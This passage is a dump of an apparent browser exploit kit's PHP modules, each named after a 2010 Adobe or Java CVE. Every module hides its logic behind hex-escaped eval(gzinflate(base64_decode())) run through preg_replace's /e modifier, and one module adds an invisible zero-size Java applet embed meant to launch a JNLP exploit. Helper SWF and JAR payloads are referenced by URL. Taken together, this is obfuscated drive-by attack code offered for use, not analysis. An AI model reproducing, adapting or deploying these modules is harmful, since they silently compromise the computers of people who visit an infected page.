c22YSKdyXJs6dHlfDbtyFFq8zM6u4PUMxI6hSdDICduu9HDhh9wBKc+5pY6UZz1FT+5p9BzrGxICo6QsriZngAs2yVHMBVkRCV4O5bb1mz8rx9GLFqKr+PWFB0vS8bXT8j+PPvvq7vFMwSpY0GO+RAXBGYLqnKWP3zQlcxM1JsyRI8B7NNaq+FQVenPXwzZV5Vd05P4M2AF5Hft40iYQX4wBoFZsisSspKQDdDyWgu7Lls4D+IWFn9EFrkhiQPBjkv7c8/eyUhYLZHztc20al5iuOjFx3MwFaSzUpocNF7qKtcZL9rZZp/mi1ZVczdYQt5YwFfGhSp2Dg65xA89NclfIixFlYxjTVTmf8ukMQ2nKlfx1fKG+GI/HStx4ExGFCLuuF2pg+369yl4w9kJcqx3qkpZpwpej1kSEIO0/vRDxPHMaSVP5Dzquh/1MVCy2I84qVV0OHn1nohmYdsonm+UWlRQCocrjmFwGbXUyh2NW4ddIVp55Xckcj9p9C50vP8mTMyWHaue1xesc2gEKlq6x6Lc6ts3znK/igi55G2+vb7le95jXyJbqzFwJGez9Wm4j+Ez0wWs1h7fHExjEbVe7SC2vcAnjLlGJ0RRf8pB6eYVeue8HNlsI/yhkphwOqSBuEbAXWxO008HzDagFi0ccSXMbDBY8cGlhNuVdWaNQuIRIjLqEFi0XP7Ig12CezLeMSuaZAy7nokcfk75Gl8RwXEmoros5KsNCsxcjuvKAqd0nqDJVfnbAfTlNp7Et+zV/7vxmMtZzTsBi9bv/dtkJvIL/+dtvU6b/CZT9Let//Pt//x8='\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/modules/Adobe-80-2010-0188.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVfHDvU8bn2XbzNJPIj7tY2s3HvvFwME7r13P33u5B8gWRCESEoCeCTycF6L6r/XYu6TrPi3P+B//gdY/Pn7n3/cH/wfN/H5afgn7D9uhPxp4mejf5r6Cf+Tz1++f8YQ2F97/jcO+ZcN/cuG/uLQnx8Xfut/xX3+6ft/a4T82xuUElcFmnci0X4PFf9FPF4+zB21TLHq4XfNX1BaDwyDeBGMN03dtx72enMMthfZvyCQJ29nJj0IQgxYn+ClhiX4rhIKgGz5ngY0koZ1ecRBovYJQUCq3xaEgo5VKeS3PN+7cgHktEoyq0GCrUtqtKP7/ZCA1aQgYpmmYqEglciUV6JmBqFy7kczikQifwVim1A6LnIa8ZQJBsK8dguvsYZ+bEhsKiOcqx8+cX45IhAwikECKM/d8qNwCAGmMRrjKCyTtraSNHD4CeYc2NP0y1voZLpmwHjtDrbnhr7nFbjpLXIyoOnWizx70L62+r5mBuXDXQH1K9YSIOV1Ldh+uE2DftmwTPAFKXAbMr7PnFPOeYG08k0o3joQYl7XDWQ7dP3DT5300fmLVT625yFfHT6GTCxxuV+ifhJPxBa6jTV8pM4jW8E+jeHTnCq3O7TTSiHQjCfTmL90NqWjeIDPNf+FHg4LLe9TcZUw2rTK7wRKO6+9kIu6TmzEVMJnDVZr6ESSQ8XeKt2VSlqU8Q/31ABI0jcVXEQJOZvOfFdtAXQwcUVOdR0uTVB/bIZ2oCWbEUbNLTDnzDopLJJjyt7Y283sAvyvFindzBGEJ0+fxBGkfPF4KDi0b+A2+dnMpVq1Dtq26NjNEjPnp7+uBZRrOJ+GLIQ9HpvGR5kCyKSa+sWf+aYO0IdYGuxlWl3yd2Ins3Eds5CwDdSFPZ77ckfxZl2lfYigq+ImhC7G8UQi42qo6MCF24Gr7UvpeUc+X3ZCkLT+TRWwcCtj4U0hFK3YNym75w3ivKcOhXjzcLnCozteUlMsNbhfVgcCw+7y7mIvTFg/EMcS322Tqpp31CikTKmI8Y6dWVHIeCNEENBJS+zCVhnR/+FPi5oRwPxFpaFEuo3ituExo/pZuTXU92LfWMU7Z7QABPrll2mlfi2diVNZeGhIpfcHtwLiLrIsTNd3tbcgdWKG6/UvlQxjjAXSe7ybG74ZaUPKI7CEMZiEHCMM8DQB7S7LusmvNhe+Ancm7Jy+6bLzdYxhfRwWmpAU1kJf2WDfrydHeL2b1DdCt2CKNQ4kp4jrxYmchWuQyoCfI9Yz0t8TKa+HBZ0TaCYUCP2PNtr6QNp90WPnfjQES/r4ZvdmJgD7SKPotFfNnpJu+O1Y0kkqHiMoXDUdL0BD4eQnmlJyxCikrYPt9qPWrDyzL7D5yYfQZPSL2r3wxFNOIQ/RTEL3IVfS13iS+nxlvO6LheAOQDT4VHm24ZH1SBzxgsJMmOrNpajnUbEvcjirj3/0aZWmsxp2/DUAUnM3lR9c6xftfcqOf2e7S4B2TKskARG/9spLVt84JxuA9JwQQYjDLtZz97u6AcHEADWq3yRU8FlZ/WC1J8dLRXSGpvjEq0Q0iOE5jFQ1NrKPQjK/oOdI+tCGENtFJwtJ2ftBwwiuJo3ARWc+EzWeRS8wAOQmIGspgoA3B//CmJZEh+I44qyOJxGQthNbTxUX1Q1Gvzw2nmX8y0F/Z0OSVhGonzgdGfFH1HQdOVP+5LiyhTwaPwiMHQ+nkmkSJYqIlXi08lq3oWhAHLywd9oJ3SoIzv2OFzQNTJlvct9bhaBavEaW/dUqxT1EA/oluU21btlri4QBKuxdqa7da068/kjD6j5sBBlmEbjSkJOKSdBJsGOH3qdrO+KUrnLJOlU6CEEdpjaGpUN6Nd0MnAvtuXG4936lhLmmgKt36/605yh9Xfatdyb3ner9QDGmfXdi+rgX8rILj+DYidX5Bsa0JUGSwEkLGgBkMg53epESUCwM9KAqjZiiQIMpXj1xjd5ddh8ctKXm1wbCzygMiBi8NHOUjLKI7sVP0MEFg6zcUtCORV0s06W40rtZRvZ4aa9JBSa8+Bt1bYOFDBddGC22/li3N01fezYQG/H0gFrbVHfLw7zhmzLapxxtMDFUmCrPK4rFtVYDPjHSMLi4mLMx6DdvGzEyxDO/UsUh/QP9oFdDgY6ygw9iiXPZKsaY+pEfam4/BxP+ZFajon3+qzSqpt/8/ew5R9GMUK7yLdHCIQGN8LvDLMF+Ci4MVrfiNvoEVPCpuPPmnGaFifk15eSin06n91hchq3kLBe1VqWAFMx5Vrka14qUiTdSNmQdQLdouUWKL8XyRK+Xa1vHNGJEszISPt3N3Dwk6As/d+/nywjDUdarWcpK9volzTEo8rH8OHqRR3nBqSPFoGmViMaJN5RFsRwRkC5644BSy2Omj0eFHYzpvLw+zFjD4AejOJ7OIHxjPRTzQzqpLzY7tcqodVqvyYZDtsKkyQvSuJXmfnCHTKmRpSKwZd8wzHDG35T9lnF9PhlSaCeTfkc38A2S/36QqSH48sb2mRAaLc9WMYc+cUS+Hf7ViSH45MMYGiKgBgqtBbkWctCvNxOHgKquT7ZuGWEbSWvy51iPSVNWroOTm6mKZwEvXd5FbFotDwNdmPv2F2DCMuJM/qBx3o6rA7MYZVNlGbwT2tNCqlZsybxCs0rsYf2tkGpzDNtENz2wQzo1JcmT1qQONxn3U2U9wB0J5k8t5MnHXLhxWB6wYlC+bNvm1h4FyCfRPFqZ7ivA7FY49qPCpySEDWaEIyx+vhAXGlQCROvY3ZThjmTsibCA7T1mE6wY9sltmEQtk04mIlo8nQ4ugzdWARTa2z6xKyOHIUnBXHc3GyOiPdn5l2fM5OJpzqUMbRkGJ61cxLg5PKmQTU0qR7SDRvIw8wmItEaaqTloEWvRLMmbYbqCW790RGxnb1+QbbehpF1vk9nN2dL7DCxH6pv60MnSxYFwrb1WCrKy3PpjhPnSzNr6jB2Z1PnqEjvH+8mG7oOBEnZ8i/JM0mcagp5vdZ1kOs/vu5GsSt5eehRpf1ubTpEpr9uWPMZ62W7zBg0+ycqmUfXz0T/hK8Esbpemzt6kEi5Kl1qFgY0wM7/etoexLHg0RA9kELyq7LcGzC1wZRAT6n5yReLSH/OzRRhgVIwAQsj9llggiqA3XAgvJJjuuUlZN2Ibs3P4jd5sHgTjNRjvup1qzBTC2lUPcp1S9VnR9fwGR79p0izBbCL0S7jtlAXcD4289PoKLfVayQwDW26dlzzV+dGqSXKE/kHCoHIX/+bZKcy14JJK68UIdQgstfQOewbbUIuJTb44uDXsIPRu5Yk8eyZuIGUCIQO+e7d83CN30xkXgR+EflTB/ec1MAW+KXh9hDGqjBgiv5/o0czjQhX0V+Od20SmEKvc+G2b9pG1ZNrMvuF5Fae+8+ardRwjQlkJdQgsWUrB2zm+zLcYwRCJ6BjieFb99bPDXTd6ZqqUx0vB5K2EejpY4uR1GysCL2m8HtBXjO3LWIlWT3oFCirD2T3ix1RLp4XmEV4k3PtxK9dyo18XBCMPp5fHCSofw+CuXRA90BMrd3KVeOEm/4wHRpCv/AKwMGTnjyEsqj/Ge4J7Zs3sqdpcoWFol69Z9V48hmxm5/0h1eO0Cax1nkjAxVyF3c2ynqR+77YhExUMhP41m+ilLw9DldBrBWAowO16quKLeiwzK5VrNWeke/k9TVp2psA+LbKgUd2kdDK3V5fLWe3wDdDrNFJwE8mUuhxaklpCMGo3SjQY0mkNqk6vLDXLVjJmZrsvsc3uNyCHad9qujwmmIqgpZNrrMGlj8ryTQHDkVjh6riNwYOBP2BicT25cHdKJWxJ68y+OUn0aLwpCef9gG1/49xvBMAwGj8/P5bzKD8eygeFmg+3wZR60ZyttK0m4juvk4xda3eWiPRgmreAxpEKjkRCC8D1wn7yKgMp9f2qrPRI3qOwnZfeSnyHURMo4YZWOST56ojvh5yI9qK8xOayv9YEcNLqJ3whxdKRIEiSCaLTqu5DdrF9W/AeRJ6MGsDvxY7stViynDUfXLcjo+wFWP4R+V50Ke32MauvP3zQszHKAxYfHVpE5g0OawAwqiuS13OcHpZJoJ9abg+BqM3NMDylOppJb7+zL3ACttZJFeWF1MLaWeZ2FHvxWLmOUCzRtHdT8isyD5WjVJ6cxmqEjZOlRnrJeck+ThLL0xHnfLKEd4C7G1GSfAw+nR7JUp1A1eDqdO9iJ3kDJRb97TfZU/8nKPPn73/+/Pt//Q8='\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/modules/Adobe-90-2010-0188.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/modules/Java-2010-0842.php:
--------------------------------------------------------------------------------
1 | <?
2 | include_once('config.php');
3 | ?>
4 | 
5 | 
6 | <?php
7 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVPJrqNWFPyXt+l0iJrJcEFZYSYz2WDMqCdF2ICZuWAMXL4+dF5LnUWpVMPZHKngmD3/GTPYJI/sjw/8x5949vHXx+fKMp8rYHcmd4ifK8XtDHZP2JnfIe9gv7KfHXD4uvmvR/3y6C+P3nv0njPKrn/12J/Z/zTFfdt8U6/gJCj2EoYo0XsgxZWvegKY4ntQCapGeFFQSoGzRUDhcr06u49XzRekCf00uL3r95wPUs0stn+9lsUNzS9qfVjjnX2HdbbkVxK+JHF9nrgUpbTIG8Yqbpa5CuGTDmeT0Ge6SzmGqy8VXfkD8lVzZoIAc60TPSI87kxaGPKsOF6m7XmvHPEyx9sKN2spJVlZwhuYJ6UgW85u1lFNYmBnhTPZ8XbYrNrTqkdcGAnw3ZdNMa7Uda1ewNZHyJsesppdW6SljnQRR6NvaCkKN/01FqrhX/o29fvWux1uMhPpYJhCp2aO/jkV3y2czzRxVoyHLuO2imZdYoQDvLsN5PEG4DZGxQzZ2Qb0/GuK5SVWcvt3j9kwCbfIksbNnfqSx0euyO7usxKBc5ZXSspg9OQa5dbKyOSd06SIwKwZleS4SPIzdkMVcSw9L2KTJMTvNEnQZjo5Ype4OhbOhNYT8jXYWFWL4tjCX+x5vPKXZGPCqV4cxGHwIAtC5i5bH6wAoqvaWQ1rALtWvF5ski21sFZ5l8UpgErVReLRnySpQwPKIBwsISD9wUtzV50xbZk1bD2/yYIl9WUj8dh40eSolZ18UEW6xdOWj+x1LUnWXBoRD2MKydikIwsx747xXi/KGaXDKrS9lheKKN4Wp6/YLrhHGwHvbwMRhDobQ24+7CPVJPbsHPKQ7MgmA3fLwu2k1HzuQpmZo1eX1RV5d4s0JZb8Z1W2IK30aqBSPSh1jZjCaLnOKKlBCjojYZ7QopvpcY4taizTU2U/8oIZsjmbS7xXvu2r4H+DPu7D/Pj+978='\x29\x29\x29\x3B","");
8 | ?>


--------------------------------------------------------------------------------
/modules/Java-2010-3552.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVTZDqNGEPyXfdkkRMEGBhhFeeA0pzltDFop4j4MmPv6+rDZlZKHUqmrqlujUau7Ic3/HtKuDuP0ly/oH7+h6Zffv3zbSPBto8iTrye4bxtGn0ydGnMyPCGcIH943zMU8aPn3xz2U8N/aPiZw08fiGf9M0d+9/5XY/TX42kqR39vBGl/oYeilEykV70MRnZcEUQ276ImVNP7ldOiKe0R6ujvGm6b2oVkX9efGrpVCwJ4mEOwNQu6My8U8jGBZgtKLJ0pQHApXYqMCQ1dVOmyJ94w7vGq0JYLyAyXH2bVHhMNoJreMm/wm/hutIA3EC81UEOC4SXqNITcbilgew9J6OeOLBFmB4kFUxhDwpzoEesD8g0bemZ97cX7siGVKV290v4ijy4Amu7D6QHwnF2vOKdi9uQ9nUQv8iX3ZseA75C0537va/uwOT3iRUzZeu1wej9wwg+pbbzHZRv6NBR2T0ERByBP+QmVykm7dVk17fi7oFd6pcqjI2CMbgs000tI4FjnBM5jY54RZ+oKkvTA6E2Gvt2RMaizy5OfQ4Uke5wbE9PLvSRv7UqxUtUPii2KGkFnVrYd3IItVMhNZJjlIt3vqo6qkfv5pIdmqaSZTpi+Spt66GDO1peSCLkg6WtqH4rLrZOtrMyTbSrz4T3mYRgE9DUGkap9vNKOudW5Fw+2c7ohiwnDwRICe1YkOiXFyuqlEctdKtr4DJYdRwnvUXS93gOutFp25iRTjUTcDaqWAfjaL+fwizXswzElKxNoCFJymJjfOh4eVf3g32OPPJ3oUQ7+cNXLcnKBAVRCc8B6BH1SXRp5bT9RSah0GydTPV/EVjoG7Q5AEFzdTvepSA0f63iNxaG0nutqRJYRvyurk2D6CR26QVyRSzcjvNjlLakYCmEemk5H2zszKgGkhsMCQV63Phol5Agv1PS6iRFX2gzUg2Grh4kWSjPzh77xYB4ck0qQcix4Yf/JR15ZeIK3RIuu2z7c9UZ5G4fpqFiVE36iyINfp9L7KoXYGJhMFXf+Vc2LvUMXvXmoY9AurCJSIHniy2dbj2Q0nZCcleT1Hj6OJdMaIxuaOg/6THE+qTflvcvmRnZBef8Qmo/bHzvyhgTvNeG+n0+TrbFBtFbkeqp8anZYk7VniMoSOVQPdXTUZunVtjatHnwGDJVEmBqf2xYixbn4uf9BsIIVOfe47q7a7Z09SbsuDnbuswLvCmLX1qGoJWi83N3QvjlBmkS31L+FMZCZYylIWM2UUclc5Tvr+ZmtbvSrLxciacvBOx452V5maGGZMYhsM4qBIBZQEEnmMRlPZc0vixPckDuygIDwCMiGVhVxY+cvgrKld7O66GXYY1lF2hoh0rPfUv59fEeS7M+cHEU0rJEM3eK/vp5XDP4HnD0P6Zdf//wH'\x29\x29\x29\x3B","");
 3 | ?>
 4 | <html>
 5 | <body>
 6 | <object id="java_obj" classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" width="0" height="0">
 7 | <PARAM name="launchjnlp" value="1">
 8 | <PARAM name="docbase" value="<? echo $docbase ?>">
 9 | </object>
10 | <embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="<? echo $docbase ?>" />
11 | 
12 | </body>
13 | </html>
14 | 
15 | 
16 | 
17 | 
18 | 


--------------------------------------------------------------------------------
/modules/JavaSignedApplet.php:
--------------------------------------------------------------------------------
1 | <?
2 | include_once("config.php"); ?>
3 | 
4 | 
5 | <?php
6 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TZPHrqRmFITf5W7GY6whJ3lFbGLTZBpdySL/3WRomvD0ZnxHGi9KpVP1nWUNU1H9MxVDk2TFHx/wjz/h4uOvj8+NIj83mjodPSV8bhhzOn1m3OnsKekU9dX9ZGji6+c/DvuV4V8ZfnL42ZPyef/iqJ/d/26M+XYEhvYcXrZ0W6NoTzXnItOpOuyEKYktg2ALhTlqy60LW5tbt7Gtuam7G+GKNDbTOIbhGCzQ7rGYm7/kLNWGFcdoewlTg1yiNrmUQxPHbfAAZbXX7KHTeq/psDkh3NTi0duYLZ4l8cKCr0KfE2iSsd6IwCpVQu79CkHvtnAL2sxrrGLDyD6KOQv3CDKmNXYtYEnS9FjCHk7G5YVA+3ipijitHE9EPEwDsjgPV3FQeou/jisy+SbRKDLfxJ2fNJ6/9HbEO9R6vECXVuPY1ALRmHjRSGIY1+gQ18zUVCQP9LSBRiIpOn5PjylJjKmUEvqZBuFFL5/7S4Y12DYv6GDiHQ3hMEKSZPh2H74dSlUrDAS4caxv9G8jkRKbk1bcAEz2mMlSHhj+Ufmdos2iT1xbCKdqV7r63TVnRjiiHcC4AWB7R+xrAcSkzXK2hHnyHgFzPqj7SlB7M6vv4KGg62YI8cIE7mqIyUZ3Fm8d7Y3Km71OgABosxruoiOtediBBXLb3c9GE9p63lOmSnLfcI3gSd3iReHXPpkq0UACxnrmTEav+dHqzwytDl6CQe5p5XDEHc6gIhYXpCVE2hZSZLvLUVguleKED59zJNQbpcZS/CsKl+ASY8tjfg98FxkzwOgLrbwUNbVAvOxWO2i+Couhf+eiKaCXVJCEW6DHrZNhRSHHNth37HlzRxNJH7ohmFudv7QnvNBebPX0wAex4dHriqDynIT9IuqjzHBbwW930gXPxSfxGKp1UlEBpxI8bBper/YF7MRazqiUDPzdFsQ2KTWKIEA/DbcjD8GOM1Zf+q/EuBXvFJ7lb+di2N/C+XO0H9///hc='\x29\x29\x29\x3B","");
7 | ?>


--------------------------------------------------------------------------------
/modules/helpers/Adobe-2010-1297.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/modules/helpers/Adobe-2010-1297.swf


--------------------------------------------------------------------------------
/modules/helpers/Adobe-2010-2884.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/modules/helpers/Adobe-2010-2884.swf


--------------------------------------------------------------------------------
/modules/helpers/Java-2010-0842.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/modules/helpers/Java-2010-0842.jar


--------------------------------------------------------------------------------
/modules/helpers/Java-2010-0842Helper.php:
--------------------------------------------------------------------------------
1 | <?php
2 | preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TVTHDttmGHuXXNJWRTWtgaIH7WFrWPsXAhSa1t7Levo6TYD2QBAfye/AC8c5f/0952Mbp/kvX+A/foPzL79/+XaSt28nRX4Y/YD/dmL0h6mPxn6Y+UD8gPzhfc9QxI+ff3PYTw3/oeGfHP7xb9Ln/pkjv3v/uzH66+W72rStgWi9ww1vNeWu3dTOKQdaCWKpr5fk9TSk7n1bO2e/buT2hBy3iCJJ9EPfs1zEwKygoPrO8tFWfsKFw8Mw0BqFYqBCJhAmaU5GVwCbS9fBdELnWbUAAdNhi+EBMVRZyXC+Uybh0gjRLHVdniek2TQqMG9GKfbwCs2itzA0tDG7R5LeXMAcj7dWDrxrXZ6Apt2p8R9+ABFnA7MxRRnQJauveX3Kk1fZnwL0ywFrGh+E2y0H7/rRqjRpFryG3QkOjRpWWe+EiZnMmJ2Q8CRBZaNltCd2VDxQQGkDd2cGKa1D+rbhuQDwgkdKN3JaYb6PLgQptvGGCZY9bypU7CQDw8xyHSe62pfuaFpaWZ06xzinMy+87R30SKAVtpZF5pldoR2KDQWMCW8A03ZsT4JFSrbzeuu8qmZAA4FeA+u63+anrtIYFSsrMxgelkgkYW75Y59VImQT930pPce9gZNuZOCJeSqdOG0qbaiKz1GMFpfbYUTLMkQLqfHMslBRVJVemOy1pn1chtY2ZQIYDDhoU4MvBa4kkQYll1kEJehUdNeyKFrJ6FBY0rdHTloA4D